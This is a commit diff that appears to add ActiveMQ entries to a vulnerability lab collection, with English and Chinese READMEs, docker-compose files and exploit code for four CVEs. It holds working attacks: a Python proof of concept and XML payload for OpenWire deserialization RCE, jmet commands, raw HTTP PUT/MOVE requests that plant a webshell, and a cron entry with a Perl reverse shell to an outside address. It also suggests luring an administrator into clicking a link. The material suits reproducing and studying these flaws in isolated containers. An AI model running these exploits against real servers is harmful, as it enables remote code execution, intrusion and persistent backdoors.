first commit

activemq/CVE-2015-5254/README.md

@@ -0,0 +1,61 @@
+# ActiveMQ Deserialization Vulnerability (CVE-2015-5254)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
+
+Apache ActiveMQ version 5.x before the 5.13.0 security vulnerability, the vulnerability caused by the program does not limit the classes that can be serialized in the proxy. Remote attacker can make a special serialized Java Message Service (JMS) ObjectMessage objects exploit this vulnerability to execute arbitrary code.
+
+Reference Links:
+
+- https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf
+
+## Vulnerability environment
+
+Start the vulnerable environment:
+
+```
+docker compose up -d
+```
+
+After running the environment, it will establish two ports on port 61616 and 8161. Port 61616 is the working port, and messages are delivered on this port. Port 8161 is the webpage management page port. Access `http://your-ip:8161`, You can see the network management page, but this vulnerability does not require a network theoretically.
+
+## Exploit
+
+The exploit process is as follows:
+
+1. Generate serialized payload (u can using ysoserial)
+2. send payload to port 61616
+3. Access the web management page and read the serialization messages, then u can trigger vulnerability.
+
+To exploit this environment we will use [jmet](https://github.com/matthiaskaiser/jmet) (Java Message Exploitation Tool). First download the jar file of jmet, and create folder called **external** in the same directory (otherwise it may occur the error that the folder does not exist).
+
+the jmet is to use ysoserial to generate Payload and send it (the jar comes with ysoserial, we don't no need to download it again), so we need to choose one that can be used in ysoserial as the gadget, such as ROME.
+
+Execute:
+
+```
+java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
+```
+
+![](1.png)
+
+At this point, a queue named event will be added to the target ActiveMQ.
+
+You can visit `http://your-ip:8161/admin/browse.jsp?JMSDestination=Event` to see all messages in this queue.
+
+(**login / password:** admin/admin):
+
+![](2.png)
+
+Click this message to trigger the command execute, this time into the container `docker compose exec activemq bash`,
+
+we can see /tmp/success has been successfully created, indicating exploit successful:
+
+![](3.png)
+
+Replace the command with a reverse shell statement and reuse it:
+
+![](4.png)
+
+It's worth noting that accessing messages through the web administration page and triggering the vulnerability requires administrator privileges. In the absence of password, we can induce administrator visit our link to trigger, or disguised as legitimate messages from other services need to wait for client access when triggered.

activemq/CVE-2015-5254/README.zh-cn.md

@@ -0,0 +1,53 @@
+# ActiveMQ 反序列化漏洞（CVE-2015-5254）
+
+Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
+
+Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
+
+参考链接：
+
+- https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf
+
+## 漏洞环境
+
+运行漏洞环境：
+
+```
+docker compose up -d
+```
+
+环境运行后，将监听61616和8161两个端口。其中61616是工作端口，消息在这个端口进行传递；8161是Web管理页面端口。访问`http://your-ip:8161`即可看到web管理页面，不过这个漏洞理论上是不需要web的。
+
+## 漏洞复现
+
+漏洞利用过程如下：
+
+1. 构造（可以使用ysoserial）可执行命令的序列化对象
+2. 作为一个消息，发送给目标61616端口
+3. 访问web管理页面，读取消息，触发漏洞
+
+使用[jmet](https://github.com/matthiaskaiser/jmet)进行漏洞利用。首先下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。
+
+jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。
+
+执行：
+
+```
+java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
+```
+
+![](1.png)
+
+此时会给目标ActiveMQ添加一个名为event的队列，我们可以通过`http://your-ip:8161/admin/browse.jsp?JMSDestination=event`看到这个队列中所有消息：
+
+![](2.png)
+
+点击查看这条消息即可触发命令执行，此时进入容器`docker compose exec activemq bash`，可见/tmp/success已成功创建，说明漏洞利用成功：
+
+![](3.png)
+
+将命令替换成弹shell语句再利用：
+
+![](4.png)
+
+值得注意的是，通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下，我们可以诱导管理员访问我们的链接以触发，或者伪装成其他合法服务需要的消息，等待客户端访问的时候触发。

activemq/CVE-2015-5254/docker-compose.yml

@@ -0,0 +1,7 @@
+version: '2'
+services:
+ activemq:
+   image: vulhub/activemq:5.11.1
+   ports:
+    - "61616:61616"
+    - "8161:8161"

activemq/CVE-2016-3088/README.md

@@ -0,0 +1,124 @@
+# ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+## Environment setup
+
+Enter following commands to build and run the vulnerability environment:
+
+```
+docker compose up -d
+```
+
+The environment listens to port 61616 and port 8161, of which 8161 is the web console port. This vulnerability appears in the web console.
+
+Visit `http://your-ip:8161/` to see the web page, indicating that the environment has been successfully run.
+
+## Background brief
+
+ActiveMQ web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, fileserver is the interface for storing files; admin and api need to log in before they can be used, fileserver does not need to log in.
+
+fileserver is a RESTful API interface. We can read and write files stored in it through HTTP requests such as GET, PUT, and DELETE. The design purpose is to compensate for the defect that the message queue operation cannot transfer and store binary files, but later found that:
+
+1. Its usage rate is not high
+2. File operations are prone to vulnerabilities
+
+Therefore, ActiveMQ has closed the fileserver application by default in 5.12.x~5.13.x (you can open it in conf/jetty.xml); after 5.14.0, the fileserver application is completely removed.
+
+In the test process, you should pay attention to the version of ActiveMQ, prevent useless effort.
+
+## Vulnerability Details
+
+This vulnerability appears in the Fileserver application, the vulnerability principle is actually very simple, that is, fileserver support to write files (but do not parse the JSP), while supporting the move file (MOVE request). So, we just need to write a file and then move it to any location by use a move request, causing arbitrary file write vulnerability.
+
+Write files such as cron or ssh key
+
+1. Write Webshell
+2. Write files such as cron or ssh key
+3. Write libraries and configuration files such as jar or jetty.xml
+
+The advantage of writing webshell is convenient, but the fileserver don't parse jsp, admin and api both need to log in to access, so it is a bit futile; The advantage of writing cron or ssh key is to directly reverse Shell, it is convenient too, the disadvantage is that you need root privileges; write jar, a little trouble (requires jar back door), write xml configuration file, this method is more reliable, but there is a futile point: we need to know ActiveMQ absolute path.
+
+Let we talk about the above several methods.
+
+### Write Webshell
+
+As I said earlier, the Webshell needs to be written in the Admin or Api app, and both applications need to be logged in to access.
+
+The default ActiveMQ account and password is `admin`. First, visit `http://your-ip:8161/admin/test/systemProperties.jsp` to view the absolute path of ActiveMQ:
+
+![](02.png)
+
+Then upload Webshell:
+
+```
+PUT /fileserver/2.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 120976
+
+webshell...
+```
+
+Then move it to the API folder (`/opt/activemq/webapps/api/s.jsp`) in the Web directory:
+
+```
+MOVE /fileserver/2.txt HTTP/1.1
+Destination: file:///opt/activemq/webapps/api/s.jsp
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+```
+
+Access Webshell (login required):
+
+![](03.png)
+
+### Write crontab, automate reverse shell
+
+This is a relatively stable method. First upload the cron configuration file (note that the newline must be `\n`, not `\r\n`, otherwise the crontab execution will fail):
+
+```
+PUT /fileserver/1.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 248
+
+*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+Move it to `/etc/cron.d/root`:
+
+```
+MOVE /fileserver/1.txt HTTP/1.1
+Destination: file:///etc/cron.d/root
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+```
+
+If both of the above requests return 204, the write is successful. Waiting for the reverse shell:
+
+![](01.png)
+
+This method requires the ActiveMQ run as root, otherwise it will not be able to write to the cron file.
+
+### Write jetty.xml or jar
+
+In theory we can override jetty.xml, remove the login restrictions for admin and api, and then write webshell.
+
+In some cases, the owner of jetty.xml and jar is the user of the web container, so the success rate of writing crontab is higher.
+
+Not tested yet.

activemq/CVE-2016-3088/README.zh-cn.md

@@ -0,0 +1,127 @@
+# ActiveMQ任意文件写入漏洞（CVE-2016-3088）
+
+## 环境搭建
+
+搭建及运行漏洞环境：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境监听61616端口和8161端口，其中8161为web控制台端口，本漏洞就出现在web控制台中。
+
+访问`http://your-ip:8161/`看到web页面，说明环境已成功运行。
+
+## 背景简述
+
+ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。
+
+fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：
+
+1. 其使用率并不高
+2. 文件操作容易出现漏洞
+
+所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（你可以在conf/jetty.xml中开启之）；在5.14.0版本以后，彻底删除了fileserver应用。
+
+在测试过程中，可以关注ActiveMQ的版本，避免走弯路。
+
+## 漏洞详情
+
+本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。
+
+文件写入有几种利用方法：
+
+1. 写入webshell
+2. 写入cron或ssh key等文件
+3. 写入jar或jetty.xml等库和配置文件
+
+写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋；写入cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道activemq的绝对路径。
+
+分别说一下上述几种利用方法。
+
+### 写入webshell
+
+前面说了，写入webshell，需要写在admin或api应用中，而这俩应用都需要登录才能访问。
+
+默认的ActiveMQ账号密码均为`admin`，首先访问`http://your-ip:8161/admin/test/systemProperties.jsp`，查看ActiveMQ的绝对路径：
+
+![](02.png)
+
+然后上传webshell：
+
+```
+PUT /fileserver/2.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 120976
+
+webshell...
+```
+
+移动到web目录下的api文件夹（`/opt/activemq/webapps/api/s.jsp`）中：
+
+```
+MOVE /fileserver/2.txt HTTP/1.1
+Destination: file:///opt/activemq/webapps/api/s.jsp
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+
+
+```
+
+访问webshell（需要登录）：
+
+![](03.png)
+
+### 写入crontab，自动化弹shell
+
+这是一个比较稳健的方法。首先上传cron配置文件（注意，换行一定要`\n`，不能是`\r\n`，否则crontab执行会失败）：
+
+```
+PUT /fileserver/1.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 248
+
+*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+将其移动到`/etc/cron.d/root`：
+
+```
+MOVE /fileserver/1.txt HTTP/1.1
+Destination: file:///etc/cron.d/root
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+
+
+```
+
+如果上述两个请求都返回204了，说明写入成功。等待反弹shell：
+
+![](01.png)
+
+这个方法需要ActiveMQ是root运行，否则也不能写入cron文件。
+
+### 写入jetty.xml或jar
+
+理论上我们可以覆盖jetty.xml，将admin和api的登录限制去掉，然后再写入webshell。
+
+有的情况下，jetty.xml和jar的所有人是web容器的用户，所以相比起来，写入crontab成功率更高一点。
+
+尚未测试。

activemq/CVE-2016-3088/docker-compose.yml

@@ -0,0 +1,7 @@
+version: '2'
+services:
+ activemq:
+   image: vulhub/activemq:5.11.1-with-cron
+   ports:
+    - "61616:61616"
+    - "8161:8161"

activemq/CVE-2022-41678/README.md

@@ -0,0 +1,83 @@
+# Apache ActiveMQ Jolokia Authenticated Remote Code Execution (CVE-2022-41678)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
+
+Apache ActiveMQ prior to 5.16.5, 5.17.3, there is a authenticated RCE exists in the Jolokia `/api/jolokia`.
+
+References:
+
+- <https://activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt>
+- <https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/>
+
+## Vulnerable Environment
+
+Execute following command to start a Apache ActiveMQ 5.17.3:
+
+```
+docker compose up -d
+```
+
+After server is started, open the `http://your-ip:8161/` and input username and password with `admin` and `admin`. Then you will see the index page of Apache ActiveMQ.
+
+## Exploit
+
+Firstly, listing all avaiable MBeans in Apache ActiveMQ by `/api/jolokia/list`:
+
+```
+GET /api/jolokia/list HTTP/1.1
+Host: localhost:8161
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Origin: http://localhost
+
+
+```
+
+![](1.png)
+
+There are 2 exploitable MBeans that are able to perform RCE in this list.
+
+## Method #1
+
+The first one is using the `org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean`, a MBean provided by Log4j2.
+
+Attacker can use this MBean to update the Log4j configuration and write logs to arbitrary directories.
+
+I prepared a [poc](poc.py) to reproduce the whole process:
+
+```
+python poc.py -u admin -p admin http://your-ip:8161
+```
+
+![](2.png)
+
+Webshell is written to `/admin/shell.jsp` successfully:
+
+![](3.png)
+
+This method is limited by version of ActiveMQ, since Log4j2 was introduced in Apache ActiveMQ 5.17.0.
+
+## Method #2
+
+The second one is using the `jdk.management.jfr.FlightRecorderMXBean` MBean.
+
+FlightRecorder was introduced in OpenJDK 11, users are able to use FlightRecorderMXBean to create record and save it to a file. This feature is also can be used to write webshell.
+
+Use [poc](poc.py) to reproduce the whole process:
+
+```
+python poc.py -u admin -p admin --exploit jfr http://localhost:8161
+```
+
+![](4.png)
+
+Webshell is written to `/admin/shelljfr.jsp` successfully:
+
+![](5.png)

activemq/CVE-2022-41678/README.zh-cn.md

@@ -0,0 +1,81 @@
+# Apache ActiveMQ Jolokia 后台远程代码执行漏洞（CVE-2022-41678）
+
+Apache ActiveMQ 是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
+
+Apache ActiveMQ 在5.16.5, 5.17.3版本及以前，后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。
+
+参考链接：
+
+- <https://activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt>
+- <https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/>
+
+## 漏洞环境
+
+执行如下命令启动一个Apache ActiveMQ 5.17.3服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8161/`后输入账号密码`admin`和`admin`，即可成功登录后台。
+
+## 漏洞复现
+
+首先，访问`/api/jolokia/list`这个API可以查看当前服务器里所有的MBeans：
+
+```
+GET /api/jolokia/list HTTP/1.1
+Host: localhost:8161
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Origin: http://localhost
+
+
+```
+
+![](1.png)
+
+这其中有两个可以被用来执行任意代码。
+
+## 方法1
+
+第一个方法是使用`org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean`，这是由Log4j2提供的一个MBean。
+
+攻击者使用这个MBean中的`setConfigText`操作可以更改Log4j的配置，进而将日志文件写入任意目录中。
+
+使用[poc](poc.py)脚本来复现完整的过程：
+
+```
+python poc.py -u admin -p admin http://your-ip:8161
+```
+
+![](2.png)
+
+Webshell被写入在`/admin/shell.jsp`文件中：
+
+![](3.png)
+
+这个方法受到ActiveMQ版本的限制，因为Log4j2是在5.17.0中才引入Apache ActiveMQ。
+
+## 方法2
+
+第二个可利用的Mbean是`jdk.management.jfr.FlightRecorderMXBean`。
+
+FlightRecorder是在OpenJDK 11中引入的特性，被用于记录Java虚拟机的运行事件。利用这个功能，攻击者可以将事件日志写入任意文件。
+
+使用[poc](poc.py)脚本来复现完整的过程（使用`--exploit`参数指定使用的方法）：
+
+```
+python poc.py -u admin -p admin --exploit jfr http://localhost:8161
+```
+
+![](4.png)
+
+Webshell被写入在`/admin/shelljfr.jsp`文件中：
+
+![](5.png)

activemq/CVE-2022-41678/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ activemq:
+   image: vulhub/activemq:5.17.3
+   ports:
+    - "61616:61616"
+    - "8161:8161"
+    - "5005:5005"

activemq/CVE-2023-46604/README.md

@@ -0,0 +1,57 @@
+# Apache ActiveMQ OpenWire Protocol Deserialization RCE (CVE-2023-46604)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
+
+OpenWire protocol is designed by ActiveMQ, to allow native access to ActiveMQ from a number of different languages and platforms. Apache ActiveMQ prior to 5.18.2 was affected by a deserialization vulnerability. This vulnerability may allow remote attackers with network access privileges to execute arbitrary shell commands by manipulating the serialized class types in the OpenWire protocol, leading to the instantiation of any class on the classpath of the agent.
+
+References:
+
+- <https://activemq.apache.org/news/cve-2023-46604>
+- <https://xz.aliyun.com/t/12929>
+- <https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/>
+- <https://forum.butian.net/share/2566>
+
+## Environment setup
+
+ActiveMQ listens to following 2 ports:
+
+| Default port | Default Condition                    |
+|--------------|--------------------------------------|
+| 8161 (web)   | Remote access requires configuration |
+| 61616 (tcp)  | Remote access allowed                |
+
+The deserialization issue exists in the port 61616.
+
+Enter following commands to run a ActiveMQ 5.17.3 server:
+
+```
+docker compose up -d
+```
+
+Please access `http://your-ip:8161` to confirm that the service has started successfully before exploitation, although we only need to use the port 61616 after that.
+
+## Exploit
+
+You can quickly start an HTTP server in the folder where the [poc.xml](poc.xml) file is located using the Python3 http.server module:
+
+```shell
+python3 -m http.server 6666
+```
+
+Then execute the [poc.py](poc.py):
+
+```shell
+python3 poc.py target port http://ip of http server/poc.xml
+```
+
+You can check inside the ActiveMQ container using the following command:
+
+```
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+```
+
+If you see the output showing that touch /tmp/activeMQ-RCE-success has been executed successfully, then the exploit has worked.
+
+![01.png](01.png)

activemq/CVE-2023-46604/README.zh-cn.md

@@ -0,0 +1,55 @@
+# Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞（CVE-2023-46604）
+
+Apache ActiveMQ 是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
+
+OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActiveMQ 5.18.2版本及以前，OpenWire协议通信过程中存在一处反序列化漏洞，该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型，导致代理的类路径上的任何类实例化，从而执行任意命令。
+
+参考链接：
+
+- <https://activemq.apache.org/news/cve-2023-46604>
+- <https://xz.aliyun.com/t/12929>
+- <https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/>
+- <https://forum.butian.net/share/2566>
+
+## 环境搭建
+
+ActiveMQ运行后，默认监听如下两个端口：
+
+| 默认端口      | 默认条件      |
+|-----------|-----------|
+| 8161  web | 需配置才可远程访问 |
+| 61616 tcp | 远程访问      |
+
+反序列化漏洞出现在61616端口中。
+
+执行如下命令启动一个ActiveMQ 5.17.3版本服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8161`检查服务是否运行成功。但实际上利用该漏洞，并不需要能够访问8161端口。
+
+## 漏洞复现
+
+首先，启动一个HTTP反连服务器，其中包含我们的[poc.xml](poc.xml)：
+
+```shell
+python3 -m http.server 6666
+```
+
+然后，执行[poc.py](poc.py)，传入的三个参数分别是目标服务器地址、端口，以及包含poc.xml的反连平台URL：
+
+```shell
+python3 poc.py target port http://ip of http server/poc.xml
+```
+
+执行完成后，进入ActiveMQ容器：
+
+```
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+```
+
+可见，`touch /tmp/activeMQ-RCE-success`已经被成功执行：
+
+![01.png](01.png)

activemq/CVE-2023-46604/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ activemq:
+   image: vulhub/activemq:5.17.3
+   ports:
+    - "61616:61616"
+    - "8161:8161"
+    - "5005:5005"

activemq/CVE-2023-46604/poc.py

@@ -0,0 +1,36 @@
+import io
+import socket
+import sys
+
+
+def main(ip, port, xml):
+    classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
+    socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    socket_obj.connect((ip, port))
+
+    with socket_obj:
+        out = socket_obj.makefile('wb')
+        # out = io.BytesIO()  # 创建一个内存中的二进制流
+        out.write(int(32).to_bytes(4, 'big'))
+        out.write(bytes([31]))
+        out.write(int(1).to_bytes(4, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(int(1).to_bytes(4, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(len(classname).to_bytes(2, 'big'))
+        out.write(classname.encode('utf-8'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(len(xml).to_bytes(2, 'big'))
+        out.write(xml.encode('utf-8'))
+        # print(list(out.getvalue()))
+        out.flush()
+        out.close()
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 4:
+        print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
+              "http://192.168.0.101:8888/poc.xml")
+        exit(-1)
+    main(sys.argv[1], int(sys.argv[2]), sys.argv[3])

activemq/CVE-2023-46604/poc.xml

@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<beans xmlns="http://www.springframework.org/schema/beans"
+       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+       xsi:schemaLocation="http://www.springframework.org/schema/beans
+       http://www.springframework.org/schema/beans/spring-beans.xsd">
+    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+        <constructor-arg>
+            <list>
+                <value>touch</value>
+                <value>/tmp/activeMQ-RCE-success</value>
+            </list>
+        </constructor-arg>
+    </bean>
+</beans>